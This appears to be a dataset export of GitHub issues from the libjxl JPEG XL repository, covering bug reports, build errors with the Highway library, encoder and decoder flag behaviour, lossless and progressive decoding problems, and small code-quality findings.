] | I am trying to use libJXL in Delphi but can't get it right. I looked at decode_oneshot.cc but there is a parallel runner which I don't need and seems complicated to port. I tried gluing together functions from the lib in a similar manner like in decode_oneshot but can't get it work. The main loop:
```
while True do begin
status := JxlDecoderProcessInput(dec);
```
never gets JXL_DEC_NEED_IMAGE_OUT_BUFFER, only JXL_DEC_BASIC_INFO, JXL_DEC_COLOR_ENCODING and JXL_DEC_SUCCESS. | Simplest possible example how to decode JXL into an array of RGBA of bytes? | https://api.github.com/repos/libjxl/libjxl/issues/4110/comments | 0 | 2025-02-13T08:16:59Z | 2025-02-25T19:15:54Z | https://github.com/libjxl/libjxl/issues/4110 | 2,850,296,314 | 4,110 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
8bit color grayscale image, in standard practices 10 preset have best compression than 9, sometimes 9 have more size than original png. I found image who have worse compression in 10 than 9. Last version cjxl
**To Reproduce**
 lossless compression 9-10
[alreadycompressed.zip](https://github.com/user-attachments/files/18722352/alreadycompressed.zip)
| Worse compression at high effort 5<10 | https://api.github.com/repos/libjxl/libjxl/issues/4107/comments | 3 | 2025-02-08T22:00:20Z | 2025-02-12T04:15:14Z | https://github.com/libjxl/libjxl/issues/4107 | 2,840,296,825 | 4,107 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
```
-- CMAKE_SYSTEM_PROCESSOR is x86_64
-- tcmalloc version -- tcmalloc 2.8.0 disabled due to https://github.com/gperftools/gperftools/issues/1204
-- Compiled IDs C:GNU, C++:GNU
-- Disabled AVX512_SPR (set JPEGXL_ENABLE_AVX512_SPR to enable it)
-- Could NOT find HWY: Found unsuitable version "1.0.3", but required is at least "1.0.7" (found /usr/lib/x86_64-linux-gnu/libhwy.so)
CMake Error at third_party/CMakeLists.txt:36 (message):
Highway library (hwy) not found. Install libhwy-dev or download it to
third_party/highway from https://github.com/google/highway . Highway is
required to build JPEG XL. You can run
/media/Obelisk/Compile/libjxl/deps.sh to download this dependency.
-- Configuring incomplete, errors occurred!
```
**To Reproduce**
```
cmake \
-DCMAKE_BUILD_TYPE=Release \
-DBUILD_TESTING=OFF \
-DJPEGXL_ENABLE_DOXYGEN=OFF \
-DJPEGXL_ENABLE_MANPAGES=OFF \
-DJPEGXL_ENABLE_PLUGIN_GIMP210=OFF \
-DJPEGXL_ENABLE_BENCHMARK=OFF \
-DJPEGXL_ENABLE_EXAMPLES=OFF \
-DJPEGXL_FORCE_SYSTEM_BROTLI=ON \
-DJPEGXL_FORCE_SYSTEM_HWY=ON \
-DJPEGXL_ENABLE_JPEGLI=ON \
-DJPEGXL_ENABLE_JPEGLI_LIBJPEG=ON \
-DJPEGXL_INSTALL_JPEGLI_LIBJPEG=ON \
-DJPEGXL_ENABLE_AVX512=ON \
-DJPEGXL_ENABLE_AVX512_ZEN4=ON \
-DJPEGXL_ENABLE_PLUGINS=ON \
-DJPEGLI_LIBJPEG_LIBRARY_SOVERSION="${JPEGLI_LIBJPEG_LIBRARY_SOVERSION}" \
-DJPEGLI_LIBJPEG_LIBRARY_VERSION="${JPEGLI_LIBJPEG_LIBRARY_VERSION}" \
-DLIBJPEG_TURBO_VERSION_NUMBER=2001005 \
..
```
**Expected behavior**
No Errors
**Environment**
- OS: Debian Bookworm
- Compiler version: cmake version 3.25.1
- CPU type: X64 i7700k
- 0.11.0 4df1e9eccdf86b8df4c0c7c08f529263906f9c4f
**Additional context**
```
pkg-config --modversion libhwy
1.2.0
```
```
libhwy-dev/now 1.2.0-2+b2 amd64 [installed,local]
libhwy1t64/now 1.2.0-2+b2 amd64 [installed,local]
```
```
# find /usr/lib/x86_64-linux-gnu/ |grep libhwy
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy-test.pc
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy.pc
/usr/lib/x86_64-linux-gnu/pkgconfig/libhwy-contrib.pc
/usr/lib/x86_64-linux-gnu/libhwy.so.1
/usr/lib/x86_64-linux-gnu/libhwy_test.so.1
/usr/lib/x86_64-linux-gnu/libhwy.so.1.2.0
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so
/usr/lib/x86_64-linux-gnu/libhwy.so
/usr/lib/x86_64-linux-gnu/libhwy_test.so
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so.1
/usr/lib/x86_64-linux-gnu/libhwy_test.so.1.2.0
/usr/lib/x86_64-linux-gnu/libhwy_contrib.so.1.2.0
```
```
# nano /usr/lib/x86_64-linux-gnu/pkgconfig/libhwy.pc
prefix=/usr
exec_prefix=${prefix}
libdir=${exec_prefix}/lib/x86_64-linux-gnu
includedir=${prefix}/include
Name: libhwy
Description: Efficient and performance-portable SIMD wrapper
Version: 1.2.0
Libs: -L${libdir} -lhwy
Cflags: -I${includedir} -DHWY_SHARED_DEFINE
``` | Highway is Detected as 1.0.3 Regardless of Version. 1.2.0 Installed - Cannot Compile libjlx | https://api.github.com/repos/libjxl/libjxl/issues/4106/comments | 0 | 2025-02-04T18:09:07Z | 2025-02-13T23:40:20Z | https://github.com/libjxl/libjxl/issues/4106 | 2,830,960,956 | 4,106 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
```
./deps.sh: 69: [[: not found
./deps.sh: 34: Bad substitution
```
**To Reproduce**
Steps to reproduce the behavior:
**Expected behavior**
No Errors
**Environment**
- OS: Debian Bookworm
- Compiler version: cmake version 3.25.1
- CPU type: x64 i7700k
- 0.11.0 4df1e9eccdf86b8df4c0c7c08f529263906f9c4f
**Additional context**
Fails every time even with full git pull.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| deps.sh fails with errors in bash. (user error) | https://api.github.com/repos/libjxl/libjxl/issues/4105/comments | 5 | 2025-02-04T18:03:26Z | 2025-02-07T04:32:29Z | https://github.com/libjxl/libjxl/issues/4105 | 2,830,950,225 | 4,105 |
[
"libjxl",
"libjxl"
] | null | Test that decoder does not reorder patches | https://api.github.com/repos/libjxl/libjxl/issues/4102/comments | 1 | 2025-02-03T15:45:19Z | 2025-02-24T08:27:06Z | https://github.com/libjxl/libjxl/issues/4102 | 2,827,879,926 | 4,102 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Converting a layered JXL image using `cjxl` will lead to those layers being coalesced during the conversion.
**To Reproduce**
I have attached a layered JXL image with PNG extension.
To test yourself: Create a layered JXL image, this is possible with Krita.
Using `jxlinfo` on the file shows the following:
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 500x500, (possibly) lossless, 8-bit RGB+Alpha
Color space: 9080-byte ICC profile, CMM type: "lcms", color space: "RGB ", rendering intent: 0
layer: full image size, name: "Auswahlmaske"
layer: full image size, name: "Background"
layer: 405x196 at position (48,149), name: "Text"
```
Run any `cjxl` operation on the file, lossless or lossy.
For example:
`cjxl -d 0 -e 7 JXL-layer-test.jxl JXL-layer-test-reencode.jxl`
Running `jxlinfo` on the reencoded file now shows
```
JPEG XL image, 500x500, (possibly) lossless, 8-bit RGB+Alpha
Color space: 9080-byte ICC profile, CMM type: "lcms", color space: "RGB ", rendering intent: 0
```
The layers were coalesced during the conversion, making this a lossy operation.

**Expected behavior**
The layers should be retained if an image is converted using libjxl.
I assume that djxl behaves the same way, but have not tested decoding to EXR using an older libjxl version.
**Environment**
- OS: EndeavourOS
- CPU type: x86_64
- cjxl/djxl version string: cjxl v0.11.1 794a5dcf [AVX2,SSE4,SSE2]
| cjxl does not retain layers, coalescing/flattening layers in JXL-to-JXL conversion | https://api.github.com/repos/libjxl/libjxl/issues/4097/comments | 0 | 2025-01-30T12:22:01Z | 2025-01-30T12:22:01Z | https://github.com/libjxl/libjxl/issues/4097 | 2,820,691,046 | 4,097 |
[
"libjxl",
"libjxl"
] | the png spec REC-PNG-20031110 is contradictory on whether or not to allow PNG files that have both cICP and sRGB chunks.
spec implies that with 11.3.3.3 iCCP Embedded ICC profile that it should be prohibited
> A PNG datastream should contain at most one embedded profile, whether specified explicitly with an iCCP chunk or implicitly with an sRGB chunk.
but then explicitly contradicts it in 11.3.3.5 sRGB Standard RGB colour space by simply recommending that they do not both appear, they do not explicitly prohibit it.
> It is recommended that the sRGB and iCCP chunks do not both appear in a PNG datastream.
I have come across an image with both that works in other decoders but can not be decoded with libjxl,
instead of throwing `return JXL_FAILURE("Repeated iCCP / sRGB chunk");` perhaps throwing and debug warning `JXL_DEBUG_V(2, "Repeated iCCP / sRGB chunk; iCCP chunk ignored"); continue;` would work here? | Allow png with iCCP and sRGB chunks | https://api.github.com/repos/libjxl/libjxl/issues/4087/comments | 1 | 2025-01-27T08:28:19Z | 2025-01-27T09:18:03Z | https://github.com/libjxl/libjxl/issues/4087 | 2,812,370,892 | 4,087 |
[
"libjxl",
"libjxl"
] | [example.zip](https://github.com/user-attachments/files/18551544/example.zip)
It's a rare example but I'm curious why JXL is the worst here.
All three have been compressed using maximum compression. | Bigger than PNG? | https://api.github.com/repos/libjxl/libjxl/issues/4086/comments | 1 | 2025-01-26T20:12:56Z | 2025-01-27T07:32:33Z | https://github.com/libjxl/libjxl/issues/4086 | 2,811,765,209 | 4,086 |
[
"libjxl",
"libjxl"
] | **To Reproduce**
Using `djxl Test.jxl Test.png --display_nits 1` an extremely dark image should be output, but the image and filesize remain constant regardless of setting.
**Environment**
- OS: Windows 10
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL decoder v0.12.0 3d7cec2 [AVX2,SSE2] | djxl --display_nits has no effect | https://api.github.com/repos/libjxl/libjxl/issues/4085/comments | 0 | 2025-01-25T02:02:34Z | 2025-01-25T02:02:34Z | https://github.com/libjxl/libjxl/issues/4085 | 2,810,694,199 | 4,085 |
[
"libjxl",
"libjxl"
] | 

[code.zip](https://github.com/user-attachments/files/18521278/code.zip) | Lossy compression of extra channels with pixeltype float results in unexpectedly large files | https://api.github.com/repos/libjxl/libjxl/issues/4082/comments | 2 | 2025-01-23T13:43:23Z | 2025-01-23T18:32:48Z | https://github.com/libjxl/libjxl/issues/4082 | 2,806,947,741 | 4,082 |
[
"libjxl",
"libjxl"
] | **Is your feature request related to a problem? Please describe.**
The `-j` flags in the encoder and decoder do nearly opposite things, which is confusing.
Suppose a user wants to losslessly transcode a JPEG to JPEG-XL. `cjxl --help -v` tells them this:
```
-j 0|1, --lossless_jpeg=0|1
If the input is JPEG, losslessly transcode JPEG, rather than using reencode pixels.
```
.. so they use `-j 1` to enable lossless JPEG mode in the encoder. Naturally, they assume that the decoder needs a similar `-j` option to decode the image. However, the `-j` option of `djxl` does the opposite - it causes the decoder to decode to pixels instead of reconstructing the original JPEG.
This behaviour is unintuitive because the 2 `-j` options do opposite things - in the encoder, it means to encode losslessly, but in the decoder, it means to decode lossily.
**Describe the solution you'd like**
The `-j` option in the decoder should take a `0` or `1` argument like the encoder, with the opposite meaning to what it does now. e.g. `0` -> decode lossily, `1` -> decode losslessly (reconstruct the original). The default should be 1, and the long option, `--pixels_to_jpeg`, should map to `-j 0`. Then if `-j` is specified without an argument, an error should be raised, explaining the new behaviour, which is the opposite of the previous behaviour of `djxl`.
This solution isn't perfect. Even with the error message, some users may incorrectly assume that the old `djxl -j` maps to the new `djxl -j 1`, but IMO it's better to make this change now, before 1.0, than it is to get stuck with the `cjxl` and `djxl` options having opposite meanings.
**Describe alternatives you've considered**
Inverting the existing behaviour of the `-j` flag of `djxl`. This is a bad idea as it silently changes the tool's behaviour. Things like scripts should be using the long form, `--pixels_to_jpeg`, but IMO that's not sufficient justification to change the behaviour of the short option.
Doing nothing. If users already have workflows that are set up, perhaps keeping the existing semantics is the correct option, even if it is confusing. "RTFM".
**Additional context**
Note: I'm using version 0.7.0. Maybe this was already changed in later releases, but I couldn't find anything.
| Behaviour of `-j` flags in encoder/decoder is confusing | https://api.github.com/repos/libjxl/libjxl/issues/4078/comments | 0 | 2025-01-21T23:48:11Z | 2025-01-21T23:48:11Z | https://github.com/libjxl/libjxl/issues/4078 | 2,803,046,007 | 4,078 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
A JPEG file, which Safari, Preview and Quickview can display, when transcoded to JXL via `cjxl 19617.jpeg 19617.jxl`, produces an an image the previous apps can not display. Converting it back to JPEG via `djxl 19617.jxl 19617_dj.jpeg` produces a JPEG which is once again viewable to the listed apps.
Discord user jonnyawsom3 determined that this specific JPEG has an ICC Profile named `c2ci` and that removing the profile allowed the cjxl image to be displayed on Mac. He [linked](https://photosauce.net/blog/post/making-a-minimal-srgb-icc-profile-part-1-trim-the-fat-abuse-the-spec) to a document discussing the profile.
**To Reproduce**
Download the attached 19617.jpeg file and convert it to JXL, `cjxl 19617.jpeg 19617.jxl` and view both on a Mac. Convert the JXL back to JPEG with `djxl 19617.jxl 19617_dj.jpeg` and the image will be viewable.
**Expected behavior**
The `cjxl` generated JXL should be as viewable as the JPEG on Mac.
**Screenshots**
If applicable, add screenshots or example input/output images to help explain your problem.
**Environment**
- OS: MacOS 15.2
- Compiler version: Unsure ( current installed version is: Apple clang version 16.0.0 (clang-1600.0.26.6) ) but I don't know if that was the version it was built with
- CPU type: arm64
- cjxl/djxl version string: JPEG XL encoder v0.11.1 0.11.1 [NEON]
**Additional context**
Add any other context about the problem here.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->

b0c450750)
| Transcoding a JPEG which is viewable with MacOS, produces an unviewable JXL file | https://api.github.com/repos/libjxl/libjxl/issues/4056/comments | 1 | 2025-01-09T22:43:58Z | 2025-01-29T20:15:33Z | https://github.com/libjxl/libjxl/issues/4056 | 2,778,889,624 | 4,056 |
[
"libjxl",
"libjxl"
] | Likely supporting both 2.10+ and 3.0 API in same sources is not worth it.
Perhaps we could extract some common logic, though.
Currently `debian:sid` has updated GIMP to 3.0; perhaps `debian:trixie` will be the next. | Implement GIMP-3 compatible plug-in | https://api.github.com/repos/libjxl/libjxl/issues/4037/comments | 0 | 2024-12-31T10:03:26Z | 2024-12-31T10:03:38Z | https://github.com/libjxl/libjxl/issues/4037 | 2,764,193,256 | 4,037 |
[
"libjxl",
"libjxl"
] | I have an impression that the use here of default `-1` value converted to `true`
https://github.com/libjxl/libjxl/blob/24e12baf0e8e697fdde84a5250b2df32f18cf40b/lib/jxl/enc_modular.cc#L476
is unintended as just a few lines lower the value is initialized
https://github.com/libjxl/libjxl/blob/24e12baf0e8e697fdde84a5250b2df32f18cf40b/lib/jxl/enc_modular.cc#L488-L494
This leads to paradoxical result that files encoded losslessly with and without `-R 0` are different. I think initialization should be moved before this first use of `responsive` field. | Use of unintialized `responsive` field | https://api.github.com/repos/libjxl/libjxl/issues/4028/comments | 0 | 2024-12-23T09:45:45Z | 2024-12-23T09:45:45Z | https://github.com/libjxl/libjxl/issues/4028 | 2,755,642,088 | 4,028 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Lossless encoding using `-d 0 -e 1` sometimes generates artifacts and sometimes generates a completely corrupted file.
**To Reproduce**
Download and extract the below ZIP and encode the PNG files using `cjxl -d 0 -e 1`, `glitched_image.png` will encode but will have an odd artifact and `corrupted_image.png` will encode into a completely corrupted image. Encodes using `JPEG XL encoder v0.12.0 24e12baf [NEON,NEON_WITHOUT_AES]` are given in the ZIP.
**Expected behavior**
The images get lossless converted
**Screenshots**
[Archive.zip](https://github.com/user-attachments/files/18223978/Archive.zip)
**Environment**
- OS: [e.g. Windows] `OrbStack Ubuntu VM on MacOS`
- Compiler version: [e.g. clang 11.0.1] `clang version 19.1.1 (1ubuntu1)`
- CPU type: [e.g. x86_64] `aarch64`
- cjxl/djxl version string: [e.g. cjxl [v0.3.7 | SIMD supported: SSE4,Scalar]] `JPEG XL encoder v0.12.0 24e12baf [NEON,NEON_WITHOUT_AES]` | Lossless images are not actually lossless | https://api.github.com/repos/libjxl/libjxl/issues/4026/comments | 2 | 2024-12-23T01:14:14Z | 2024-12-23T09:31:55Z | https://github.com/libjxl/libjxl/issues/4026 | 2,755,005,068 | 4,026 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/tools/jxlinfo.c line 197
Code:
if (extra.dim_shift > 0) {
printf(" dim_shift: %u (upsampled %ux)\n", extra.dim_shift, 1 << extra.dim_shift); // <-- %u vs extra.dim_shift
} | check format string | https://api.github.com/repos/libjxl/libjxl/issues/4019/comments | 0 | 2024-12-18T12:14:59Z | 2024-12-18T12:14:59Z | https://github.com/libjxl/libjxl/issues/4019 | 2,747,654,853 | 4,019 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/tools/benchmark/benchmark_stats.cc line 307
Code:
} else if (descriptors[i].type == TYPE_POSITIVE_FLOAT) {
value = FormatFloat(descriptors[i], values[i].f);
value = FormatFloat(descriptors[i], values[i].f); // <-- identical
} else if (descriptors[i].type == TYPE_COUNT) { | identical line | https://api.github.com/repos/libjxl/libjxl/issues/3999/comments | 2 | 2024-12-09T10:51:57Z | 2024-12-10T13:02:48Z | https://github.com/libjxl/libjxl/issues/3999 | 2,726,681,838 | 3,999 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/lib/extras/enc/jpegli.cc line 390:
Code:
// before the call to setjmp().
std::vector<uint8_t> pixels; // <-- unused
unsigned char* output_buffer = nullptr;
| unused variable | https://api.github.com/repos/libjxl/libjxl/issues/3998/comments | 3 | 2024-12-09T10:50:00Z | 2025-01-21T08:11:52Z | https://github.com/libjxl/libjxl/issues/3998 | 2,726,677,569 | 3,998 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I want use 1% of the data to decode and display a rough image normally。
The cjxl command I used was:
cjxl --progressive_dc=1 --lossless_jpeg=0 --quality=40 --brotli_effort=10 --group_order=1 --compress_boxes=0 --codestream_level=-1 --allow_jpeg_reconstruction=0 -e 7 2.jpg output.jxl
**To Reproduce**
Steps to reproduce the behavior:
I cut the pixel data into about 500 bytes per list element, a total of about 120 element packages. I called the API to decode, and it took about 80 packages to display a rough image. All the previous packages combined were JXL_DEC_NEED_MORE_INPUT and JXL_DEC_ERROE. Doesn't the JPEG XL official support 1% of the data to display the image? Why can I only display the image after loading about 70% of the data? How to solve it?
**Expected behavior**
1% of the data to decode and display a rough image normally
**Environment**
- OS: [Mac]
- CPU type: [e.g. x86_64]
- cjxl/djxl version string: [ cjxl 0.11.0]
| use 1% of the data to decode and display a rough image normally | https://api.github.com/repos/libjxl/libjxl/issues/3991/comments | 2 | 2024-12-04T06:41:27Z | 2025-03-09T03:12:07Z | https://github.com/libjxl/libjxl/issues/3991 | 2,716,702,019 | 3,991 |
[
"libjxl",
"libjxl"
] | If I use the API, how can I use 1% of the data to decode and display a rough image normally? If the API cannot be used, how can I implement the decoding required by myself? | use 1% of the data to decode and display a rough image normally | https://api.github.com/repos/libjxl/libjxl/issues/3989/comments | 4 | 2024-12-03T02:41:19Z | 2025-04-27T02:48:04Z | https://github.com/libjxl/libjxl/issues/3989 | 2,713,842,274 | 3,989 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.